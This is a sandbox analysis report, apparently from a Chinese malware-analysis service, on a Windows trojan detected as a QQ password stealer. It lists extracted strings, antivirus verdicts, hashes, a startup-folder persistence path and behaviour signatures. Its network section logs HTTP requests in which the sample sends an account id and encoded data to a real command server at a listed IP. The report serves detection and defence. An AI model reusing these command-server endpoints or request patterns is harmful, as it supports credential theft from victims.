Cannot read TIFF header
%s: Out of memory (TIFF structure)
Sample %d out of range, max %u
Depth %ld out of range, max %lu
Row %ld out of range, max %lu
Col %ld out of range, max %lu
StoNits
ICC Profile
Photoshop
RichTIFFIPTC
Copyright
MatrixWorldToCamera
MatrixWorldToScreen
FieldOfViewCotan
TextureWrapModes
TextureFormat
ImageFullLength
ImageFullWidth
TileDepth
ImageDepth
DataType
Matteing
XMLPacket
ReferenceBlackWhite
YCbCrPositioning
YCbCrSubsampling
YCbCrCoefficients
SMaxSampleValue
SMinSampleValue
SampleFormat
ExtraSamples
TargetPrinter
DotRange
NumberOfInks
InkNames
SubIFD
TileByteCounts
TileOffsets
TileLength
TileWidth
HalftoneHints
ColorMap
PrimaryChromaticities
WhitePoint
HostComputer
Artist
DateTime
Software
TransferFunction
ColorResponseUnit
PageNumber
ResolutionUnit
GrayResponseCurve
GrayResponseUnit
FreeByteCounts
FreeOffsets
YPosition
XPosition
PageName
PlanarConfiguration
YResolution
XResolution
MaxSampleValue
MinSampleValue
StripByteCounts
RowsPerStrip
SamplesPerPixel
Orientation
StripOffsets
Model
ImageDescription
DocumentName
FillOrder
CellLength
CellWidth
Threshholding
PhotometricInterpretation
BitsPerSample
ImageLength
ImageWidth
OldSubfileType
SubfileType
TIFFFieldWithTag
Internal error, unknown tag 0x%x
Tag %d
%ld: Strip out of range, max %ld
%lu: Invalid strip byte count, strip %lu
%s: Read error at scanline %lu, strip %lu; got %lu bytes, expected %lu
%s: Read error at scanline %lu; got %lu bytes, expected %lu
%s: Seek error at scanline %lu, strip %lu
%s: Data buffer too small to hold strip %lu
%s: Read error on strip %lu; got %lu bytes, expected %lu
%ld: Tile out of range, max %ld
%s: Read error at row %ld, col %ld, tile %ld; got %lu bytes, expected %lu
%s: Read error at row %ld, col %ld; got %lu bytes, expected %lu
%s: Seek error at row %ld, col %ld, tile %ld
%s: Data buffer too small to hold tile %ld
%lu: Invalid tile byte count, tile %lu
%s: No space for data buffer at scanline %ld
Can not read scanlines from a tiled image
Can not read tiles from a stripped image
File not open for reading
scanline
Compression scheme %u %s encoding is not implemented
%s %s encoding is not implemented
%s %s encoding is no longer implemented due to Unisys patent enforcement
Compression scheme %u %s decoding is not implemented
%s %s decoding is not implemented
Compression algorithm does not support random access
Bogus "%s" field, ignoring and calculating from imagelength
TIFF directory is missing required "%s" field, calculating from imagelength
Colormap
to read "TransferFunction" tag
wrong data type %d for "%s"; tag ignored
unknown field with tag %d (0x%x) encountered
invalid TIFF directory; tags are not sorted in ascending order
Can not read TIFF directory count
Can not read TIFF directory
to read TIFF directory
Seek error accessing TIFF directory
No space %s
Cannot determine StripByteCounts values, because of tags with unknown sizes
for "StripByteCounts" array
TIFF directory is missing required "%s" field
incorrect count for field "%s" (%lu, expecting %lu); tag ignored
Error fetching data for field "%s"
%s: Rational with zero denominator (num = %lu)
to fetch array of rationals
Cannot handle different per-sample values for field "%s"
cannot read TIFF_ANY type %d for field "%s"
to fetch strip tag
for strip array
for chopped "StripOffsets" array
for chopped "StripByteCounts" array
Error writing directory contents
Error writing directory count
Cannot write directory, out of space
Error flushing data before directory write
Error post-encoding before directory write
"%s": Information lost writing value (%g) as (unsigned) RATIONAL
Error writing data for field "%s"
Error fetching directory link
Error fetching directory count
%s: Error writing SubIFD directory link
SGILog24
SGILog
PixarLog
AdobeDeflate
Deflate
ISO JBIG
CCITT Group 4
CCITT Group 3
CCITT RLE/W
CCITT RLE
Old-style JPEG
ThunderScan
PackBits
%s compression support is not configured
SGILogEncode
SGILogDataFmt
aoB>"
x^j=|
x^j=|
x^j=|
x^j=|
?%s: No space for LogLuv state block
Inappropriate photometric interpretation %d for SGILog compression; %s
must be either LogLUV or LogL
LogL16Decode: Not enough data at row %d (short %d pixels)
LogLuvDecode24: Not enough data at row %d (short %d pixels)
LogLuvDecode32: Not enough data at row %d (short %d pixels)
%s: No space for SGILog translation buffer
No support for converting user data format to LogL
No support for converting user data format to LogLuv
SGILog compression cannot handle non-contiguous data
SGILog compression supported only for %s, or raw data
XYZ, Luv
Unknown data format %d for LogLuv compression
Unknown encoding %d for LogLuv compression
Group4Options
Group3Options
FaxRecvTime
FaxSubAddress
FaxRecvParams
ConsecutiveBadFaxLines
CleanFaxData
BadFaxLines
FaxFillFunc
FaxMode
TIFFInitCCITTFax3
%s: No space for state block
%s: Bad code word at scanline %d (x %lu)
%s: %s at scanline %d (got %lu, expected %lu)
Line length mismatch
Premature EOL
%s: Premature EOF at scanline %d (x %lu)
%s: No space for Group 3/4 reference line
Fax3SetupState
%s: No space for Group 3/4 run arrays
Bits/sample must be 1 for Group 3/4 encoding/decoding
%s: Uncompressed data (not supported) at scanline %d (x %lu)
clean
receiver regenerated
uncorrected errors
Fax Data:
%suncompressed data
%sEOL padding
%s2-d encoding
Group 3 Options:
Group 4 Options:
JPEGTables
TIFFInitJPEG
No space for JPEG state block
JPEGLib
JPEGSetupDecode
Bogus JPEGTables field
Improper JPEG sampling factors
Apparently should be %d,%d,decompressor will try reading with sampling %d,%d
Improper JPEG data precision
Improper JPEG component count
Improper JPEG strip/tile size, expected %dx%d, got %dx%d
RowsPerStrip must be multiple of %d for JPEG
JPEG tile width must be multiple of %d
JPEG tile height must be multiple of %d
BitsPerSample %d not allowed for JPEG
PhotometricInterpretation %d not allowed for JPEG
TIFFjpeg_tables_dest
No space for JPEGTables
Strip/tile too large for JPEG
fractional scanline discarded
NeXTDecode: Not enough data for scanline %ld
ThunderDecode: %s data at scanline %ld (%lu != %lu)
Too much
Not enough
PackBitsDecode: Not enough data for scanline %ld
PackBitsDecode: discarding %d bytes to avoid buffer overrun
TIFFInitLZW
No space for LZW state block
No space for LZW code table
Old-style LZW codes, convert file
LZWDecode: Corrupted LZW table
LZWDecode: Not enough data at scanline %d (short %d bytes)
LZWDecode: Strip %d not terminated with EOI code
LZWDecode: Bogus encoding, loop in the code table; scanline %d
LZWDecode: Unexpected end of code table
LZWDecodeCompat: Not enough data at scanline %d (short %d bytes)
LZW compression is not available to due to Unisys patent enforcement
DumpModeDecode: Not enough data for scanline %d
Predictor
Horizontal differencing "Predictor" not supported with %d-bit samples
"Predictor" value %d not supported
none
horizontal differencing
Predictor:
.PAVCException@@
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCNotSupportedException@@
.?AVCObject@@
.?AVCException@@
.?AVCSimpleException@@
.?AVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCFile@@
.?AVCFileException@@
.?AVCMemFile@@
.?AVCDC@@
.?AVCClientDC@@
.?AVCWindowDC@@
.?AVCPaintDC@@
.?AVCGdiObject@@
.?AVCPen@@
.?AVCBrush@@
.?AVCTempDC@@
.?AVCTempGdiObject@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCResourceException@@
.?AVCUserException@@
.?AVCCmdTarget@@
.?AVCWnd@@
.?AVCDialog@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTempWnd@@
.?AVCNoTrackObject@@
.?AV_AFX_CTL3D_STATE@@
.?AVCPtrArray@@
.?AVCStatic@@
.?AVCButton@@
.?AVCComboBox@@
.?AVCEdit@@
.?AV_AFX_CHECKLIST_STATE@@
.?AVCBitmap@@
.?AVCCommonDialog@@
.?AVCFileDialog@@
.?AV_AFX_THREAD_STATE@@
.?AVAFX_MODULE_STATE@@
.?AVAFX_MODULE_THREAD_STATE@@
.?AV_AFX_BASE_MODULE_STATE@@
.?AVCStringArray@@
.?AUCThreadData@@
.PAVCOleDispatchException@@
.?AV_AFX_WIN_STATE@@
.?AVCWinThread@@
.?AVCWinApp@@
.?AVCSpinButtonCtrl@@
.?AVCProgressCtrl@@
.?AVCImageList@@
.?AVCTempImageList@@
.PAVCArchiveException@@
.?AVCArchiveException@@
.?AVCSharedFile@@
.?AV_AFX_CTL3D_THREAD@@
.?AVCMenu@@
.?AVCTempMenu@@
.?AVCDWordArray@@
.?AVCWordArray@@
.?AVCSyncObject@@
.PAVCFileException@@
.?AVCMapPtrToPtr@@
.?AVCToolTipCtrl@@
.?AV_AFX_COLOR_STATE@@
.?AVCColorDialog@@
.?AUIOleWindow@@
.?AUIOleInPlaceUIWindow@@
.?AUIOleInPlaceFrame@@
.?AVXOleIPFrame@COleControlContainer@@
.?AVCOleControlContainer@@
.?AUIUnknown@@
.?AUIParseDisplayName@@
.?AUIOleContainer@@
.?AVXOleContainer@COleControlContainer@@
.?AVCFont@@
.?AVCEnumArray@@
.?AVCEnumUnknown@@
.?AVCOccManager@@
.?AUIDispatch@@
.?AVCOleDispatchException@@
.?AVCByteArray@@
.?AV_AFX_SOCK_STATE@@
.?AVCCriticalSection@@
.?AVCSessionMapPtrToPtr@@
.?AVCOleException@@
.?AUISequentialStream@@
.?AUIStream@@
.?AVCArchiveStream@@
.?AVCHandleMap@@
.?AVCPtrList@@
.?AVCMapStringToPtr@@
.?AUIRowsetNotify@@
.?AVXRowsetNotify@COleControlSite@@
.?AUIOleInPlaceSite@@
.?AVXOleIPSite@COleControlSite@@
.?AUINotifyDBEvents@@
.?AVXNotifyDBEvents@COleControlSite@@
.?AUIOleClientSite@@
.?AVXOleClientSite@COleControlSite@@
.?AUIBoundObjectSite@@
.?AVXBoundObjectSite@COleControlSite@@
.?AVXEventSink@COleControlSite@@
.?AVCOleControlSite@@
.?AUIPropertyNotifySink@@
.?AVXPropertyNotifySink@COleControlSite@@
.?AVXAmbientProps@COleControlSite@@
.?AUIOleControlSite@@
.?AVXOleControlSite@COleControlSite@@
.?AVCDataSourceControl@@
.?AUIEnumVOID@@
.?AVXEnumVOID@CEnumArray@@
.?AVCOleMessageFilter@@
.?AUIMessageFilter@@
.?AVXMessageFilter@COleMessageFilter@@
.?AVCOleDialog@@
.?AVCOleBusyDialog@@
.?AV_AFX_OLE_STATE@@
.?AVtype_info@@
.?AVexception@@
.?AVruntime_error@std@@
.?AVfailure@ios_base@std@@
.?AVios_base@std@@
.?AVfacet@locale@std@@
.?AV_Locimp@locale@std@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
resource.h
hmXRFVY|
""""
""""
13DggddaamuV
?@2H~w''di__k[
qNFA<665<C
SbpS:g:
USMO:
-NbkSbpS(
-NbkSbpS
OX[0R
N*N(W%
N*N(W%
N*N(W0
g~b0R
jjjjh
ebutton
clock
combobox
explorerbar
header
listview
progress
rebar
scrollbar
startpanel
status
taskband
taskbar
toolbar
tooltip
trackbar
traynotify
treeview
window
FriendlyName
CLSID
ActiveMovieGraph
CLSID
FriendlyName
MS Sans Serif
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
JPEG error #%d
Inactive Border
Sky Blue
Maroon
Metafiles
Sub-menu is not in menu
Out of system resources
Error reading %s%s%s: %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Exception in safecall method
Write$Error creating variant or safe array
Floating point overflow
VS_VERSION_INFO
StringFileInfo
080403A8
CompanyName
SkyHorse
FileDescription
FileVersion
1.1.0.0
InternalName
VedioCapture.dll
LegalCopyright
SkyHorse
LegalTrademarks
SkyHorse
OriginalFilename
VedioCapture.dll
ProductName
VedioCapture.dll
ProductVersion
1.1.0.0
Comments
VedioCapture.dll
VarFileInfo
Translation
(null)
;T^h<U_i=V`j>Wak?Xbl@YcmAZdnB[eoC\fpD]gq
Ctrl+PageUp
Ctrl+PageDown
PageUp
PageDown
Ctrl+G
Ctrl+Home
Ctrl+End
Shift+Tab
Tab/Enter
Ctrl+N
Ctrl+D
msctls_updown32
Spin1
msctls_updown32
Spin1
msctls_updown32
Spin1
msctls_updown32
Spin1
msctls_updown32
Spin1
msctls_updown32
Spin1
msctls_updown32
Spin1
msctls_updown32
Spin1
msctls_updown32
Spin1
msctls_updown32
Spin1
msctls_progress32
Progress1
MS Shell Dlg
......
防病毒引擎/厂商 病毒名/规则匹配 病毒库日期
Bkav 未发现病毒 20170316
MicroWorld-eScan 未发现病毒 20170316
nProtect 未发现病毒 20170316
CMC 未发现病毒 20170316
CAT-QuickHeal Risktool.Flystudio.17322 20170316
ALYac 未发现病毒 20170316
Malwarebytes 未发现病毒 20170316
VIPRE 未发现病毒 20170316
AegisLab 未发现病毒 20170316
TheHacker 未发现病毒 20170315
K7GW 未发现病毒 20170316
K7AntiVirus 未发现病毒 20170316
TrendMicro 未发现病毒 20170316
Baidu 未发现病毒 20170316
F-Prot W32/OnlineGames.HH.gen!Eldorado 20170316
Symantec ML.Attribute.HighConfidence 20170315
TotalDefense 未发现病毒 20170316
TrendMicro-HouseCall 未发现病毒 20170316
Avast 未发现病毒 20170316
ClamAV 未发现病毒 20170316
Kaspersky Trojan.Win32.Agent.nezdjg 20170316
BitDefender 未发现病毒 20170316
NANO-Antivirus Trojan.Win32.Agent.elzutg 20170316
ViRobot 未发现病毒 20170316
Rising Stealer.QQpass!1.648F (classic) 20170316
Ad-Aware 未发现病毒 20170316
Sophos 未发现病毒 20170316
Comodo TrojWare.Win32.Agent.OSCF 20170316
F-Secure 未发现病毒 20170316
DrWeb Trojan.MulDrop7.20804 20170316
Zillya 未发现病毒 20170314
Invincea trojan.win32.startpage.agm 20170203
McAfee-GW-Edition BehavesLike.Win32.Generic.vh 20170316
Emsisoft 未发现病毒 20170316
Ikarus 未发现病毒 20170316
Cyren W32/OnlineGames.HH.gen!Eldorado 20170316
Jiangmin Trojan.Agent.atlz 20170316
Webroot 未发现病毒 20170316
Avira 未发现病毒 20170316
Antiy-AVL Trojan/Win32.Agent 20170316
Kingsoft 未发现病毒 20170316
Microsoft 未发现病毒 20170316
Endgame malicious (high confidence) 20170222
Arcabit 未发现病毒 20170316
SUPERAntiSpyware 未发现病毒 20170316
ZoneAlarm Trojan.Win32.Agent.nezdjg 20170316
GData Win32.Trojan.FlyStudio.F 20170316
AhnLab-V3 未发现病毒 20170316
McAfee 未发现病毒 20170316
AVware 未发现病毒 20170316
VBA32 未发现病毒 20170316
Panda Trj/GdSda.A 20170315
Zoner 未发现病毒 20170316
ESET-NOD32 a variant of Win32/QQWare.AA 20170316
Tencent Win32.Trojan.Agent.Wmso 20170316
Yandex 未发现病毒 20170315
SentinelOne static engine - malicious 20170315
Fortinet W32/QQPass.ELG!tr.pws 20170316
AVG Agent5.BIOL 20170316
Paloalto 未发现病毒 20170316
CrowdStrike malicious_confidence_100% (D) 20170130
Qihoo-360 HEUR/QVM07.1.0000.Malware.Gen 20170316

进程树

LoginZ.exe, PID: 2532, 上一级进程 PID: 2404
msdtcws.exe, PID: 2612, 上一级进程 PID: 2532
下载PCAP包

访问主机纪录 (可点击查询WPING实时安全评级)

直接 IP 安全评级 地理位置
121.41.83.121 中国

TCP

源地址 源端口 目标地址 目标端口
192.168.122.201 49163 121.41.83.121 80
192.168.122.201 49164 121.41.83.121 80

UDP

无UDP连接纪录.

域名解析 (可点击查询WPING实时安全评级)

无域名信息.

TCP

源地址 源端口 目标地址 目标端口
192.168.122.201 49163 121.41.83.121 80
192.168.122.201 49164 121.41.83.121 80

UDP

无UDP连接纪录.

HTTP 请求

URI HTTP数据
URL专业沙箱检测 -> http://121.41.83.121/ver.txt 
GET /ver.txt HTTP/1.1
Accept: */*
Referer: http://121.41.83.121/ver.txt
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 121.41.83.121
Cache-Control: no-cache
URL专业沙箱检测 -> http://121.41.83.121/ip.asp 
GET /ip.asp HTTP/1.1
Accept: */*
Referer: http://121.41.83.121/ip.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 121.41.83.121
Cache-Control: no-cache
URL专业沙箱检测 -> http://121.41.83.121/bbs/cj_id.asp?name=o11458 
GET /bbs/cj_id.asp?name=o11458 HTTP/1.1
Accept: */*
Referer: http://121.41.83.121/bbs/cj_id.asp?name=o11458
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 121.41.83.121
Cache-Control: no-cache
Cookie: ASPSESSIONIDCQDQCTQT=IKJHNHBBOBAFDGBBAGNJNDBO
URL专业沙箱检测 -> http://121.41.83.121/bbs/cj_pasp.asp?zh=o11458 
GET /bbs/cj_pasp.asp?zh=o11458 HTTP/1.1
Accept: */*
Referer: http://121.41.83.121/bbs/cj_pasp.asp?zh=o11458
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 121.41.83.121
Cache-Control: no-cache
Cookie: ASPSESSIONIDCQDQCTQT=IKJHNHBBOBAFDGBBAGNJNDBO
URL专业沙箱检测 -> http://121.41.83.121/bbs/cj_xinxiasp.asp?zh=o11458 
GET /bbs/cj_xinxiasp.asp?zh=o11458 HTTP/1.1
Accept: */*
Referer: http://121.41.83.121/bbs/cj_xinxiasp.asp?zh=o11458
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 121.41.83.121
Cache-Control: no-cache
Cookie: ASPSESSIONIDCQDQCTQT=IKJHNHBBOBAFDGBBAGNJNDBO
URL专业沙箱检测 -> http://121.41.83.121/bbs/o11458/p2.asp?s=AF23CCDE689BAC4434C89C1AB42D6557EFA809A9D3ECA2D77DC38287E133E0598AF812D20DFF6F8805BE594540EAB03D9BABE2CE22604BA1910E12BD9224C1CC8FA59BB32ADE684F2CBC261B036F8236828DD98C6B7A81A21689BDCBE8738E526C5410F80B0D39ADA41C93ED7031B451310777EE92D32C665B7DC920904263F5F7658B6273A9977C1EBB&ss=<.> 
GET /bbs/o11458/p2.asp?s=AF23CCDE689BAC4434C89C1AB42D6557EFA809A9D3ECA2D77DC38287E133E0598AF812D20DFF6F8805BE594540EAB03D9BABE2CE22604BA1910E12BD9224C1CC8FA59BB32ADE684F2CBC261B036F8236828DD98C6B7A81A21689BDCBE8738E526C5410F80B0D39ADA41C93ED7031B451310777EE92D32C665B7DC920904263F5F7658B6273A9977C1EBB&ss=<.> HTTP/1.1
Accept: */*
Referer: http://121.41.83.121/bbs/o11458\p2.asp?s=AF23CCDE689BAC4434C89C1AB42D6557EFA809A9D3ECA2D77DC38287E133E0598AF812D20DFF6F8805BE594540EAB03D9BABE2CE22604BA1910E12BD9224C1CC8FA59BB32ADE684F2CBC261B036F8236828DD98C6B7A81A21689BDCBE8738E526C5410F80B0D39ADA41C93ED7031B451310777EE92D32C665B7DC920904263F5F7658B6273A9977C1EBB&ss=<.>
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 121.41.83.121
Cache-Control: no-cache
Cookie: ASPSESSIONIDCQDQCTQT=IKJHNHBBOBAFDGBBAGNJNDBO
URL专业沙箱检测 -> http://121.41.83.121/1076956519/p2.asp?ml=DA2AC8E2&mls=7CD43609E659138EA644C64DF56E66349EFA369629 
GET /1076956519/p2.asp?ml=DA2AC8E2&mls=7CD43609E659138EA644C64DF56E66349EFA369629 HTTP/1.1
Accept: */*
Referer: http://121.41.83.121/1076956519\p2.asp?ml=DA2AC8E2&mls=7CD43609E659138EA644C64DF56E66349EFA369629
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 121.41.83.121
Cache-Control: no-cache
Cookie: ASPSESSIONIDCQDQCTQT=IKJHNHBBOBAFDGBBAGNJNDBO
URL专业沙箱检测 -> http://121.41.83.121/swfurl.txt 
GET /swfurl.txt HTTP/1.1
Accept: */*
Referer: http://121.41.83.121/swfurl.txt
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 121.41.83.121
Cache-Control: no-cache
Cookie: ASPSESSIONIDCQDQCTQT=IKJHNHBBOBAFDGBBAGNJNDBO
URL专业沙箱检测 -> http://121.41.83.121/bbs/o11458/do.txt 
GET /bbs/o11458/do.txt HTTP/1.1
Accept: */*
Referer: http://121.41.83.121/bbs/o11458/do.txt
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 121.41.83.121
Cache-Control: no-cache
Cookie: ASPSESSIONIDCQDQCTQT=IKJHNHBBOBAFDGBBAGNJNDBO

SMTP 流量

无SMTP流量.

IRC 流量

无IRC请求.

ICMP 流量

无ICMP流量.

CIF 报告

无 CIF 结果

网络警报

无警报

TLS

No TLS

Suricata HTTP

No Suricata HTTP

未发现网络提取文件
文件名 msdtcws.exe
相关文件
C:\Program Files\Player\msdtcws.exe
C:\Users\test\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LoginZ.exe
文件大小 2805760 字节
文件类型 PE32 executable (GUI) Intel 80386, for MS Windows
MD5 66229fcde650f8671f0058bf9962c358
SHA1 45713d1ae867d9fe2b3727c31513e426da1cf724
SHA256 1e92d42bc6fb2fceaac740e4e11c47091efbdfa86ae69d666eccb640b7979476
CRC32 2BB554EA
Ssdeep 24576:4yacmnB3Z2ihx4o1r/HtTl6tCA8XTTv8/ib+G1RzV1E6UnFXlJYMoZsgUlFNaEeu:4wWnp/yttTEaRYtsgUhK1HdoMY5/mo
Yara
  • Look for MD5 constants
下载提交魔盾安全分析
没有发现相似的分析.
HTML 总结报告
(需15-60分钟同步)		 下载

Processing ( 30.995 seconds )

  • 24.745 NetworkAnalysis
  • 2.433 Static
  • 2.006 VirusTotal
  • 0.398 BehaviorAnalysis
  • 0.378 Dropped
  • 0.321 peid
  • 0.264 TargetInfo
  • 0.251 Strings
  • 0.119 AnalysisInfo
  • 0.071 Debug
  • 0.007 config_decoder
  • 0.002 Memory

Signatures ( 0.475 seconds )

  • 0.247 md_bad_drop
  • 0.034 antiav_detectreg
  • 0.018 stealth_timeout
  • 0.013 infostealer_ftp
  • 0.009 ransomware_files
  • 0.008 infostealer_im
  • 0.007 persistence_autorun
  • 0.007 antianalysis_detectreg
  • 0.007 antiav_detectfile
  • 0.006 antivm_vbox_libs
  • 0.006 antidbg_windows
  • 0.006 geodo_banking_trojan
  • 0.006 infostealer_mail
  • 0.005 infostealer_bitcoin
  • 0.004 antiemu_wine_func
  • 0.004 mimics_filetime
  • 0.004 antivm_generic_disk
  • 0.004 modify_proxy
  • 0.004 network_http
  • 0.003 bootkit
  • 0.003 reads_self
  • 0.003 stealth_file
  • 0.003 antivm_generic_scsi
  • 0.003 virus
  • 0.003 antivm_vbox_files
  • 0.003 disables_browser_warn
  • 0.002 antiav_avast_libs
  • 0.002 tinba_behavior
  • 0.002 stealth_network
  • 0.002 betabot_behavior
  • 0.002 dyre_behavior
  • 0.002 kibex_behavior
  • 0.002 exec_crash
  • 0.002 browser_security
  • 0.002 modify_uac_prompt
  • 0.002 network_cnc_http
  • 0.002 recon_fingerprint
  • 0.001 internet_dropper
  • 0.001 network_tor
  • 0.001 network_anomaly
  • 0.001 dridex_behavior
  • 0.001 antivm_vmware_libs
  • 0.001 injection_createremotethread
  • 0.001 antivm_generic_services
  • 0.001 antivm_vbox_window
  • 0.001 antisandbox_sunbelt_libs
  • 0.001 antisandbox_sboxie_libs
  • 0.001 antiav_bitdefender_libs
  • 0.001 generic_phish
  • 0.001 shifu_behavior
  • 0.001 encrypted_ioc
  • 0.001 vawtrak_behavior
  • 0.001 antidbg_devices
  • 0.001 antivm_generic_diskreg
  • 0.001 banker_zeus_mutex
  • 0.001 bot_drive
  • 0.001 bot_drive2
  • 0.001 browser_addon
  • 0.001 darkcomet_regkeys
  • 0.001 disables_system_restore
  • 0.001 md_url_bl
  • 0.001 mimics_extension
  • 0.001 modify_security_center_warnings
  • 0.001 office_security
  • 0.001 packer_armadillo_regkey
  • 0.001 rat_pcclient
  • 0.001 rat_spynet
  • 0.001 stealth_hiddenreg
  • 0.001 stealth_hide_notifications
  • 0.001 targeted_flame

Reporting ( 0.699 seconds )

  • 0.693 ReportHTMLSummary
  • 0.006 Malheur
Task ID 84941
Mongo ID 58ca95c2a093ef48d1257c30
Cuckoo release 1.4-Maldun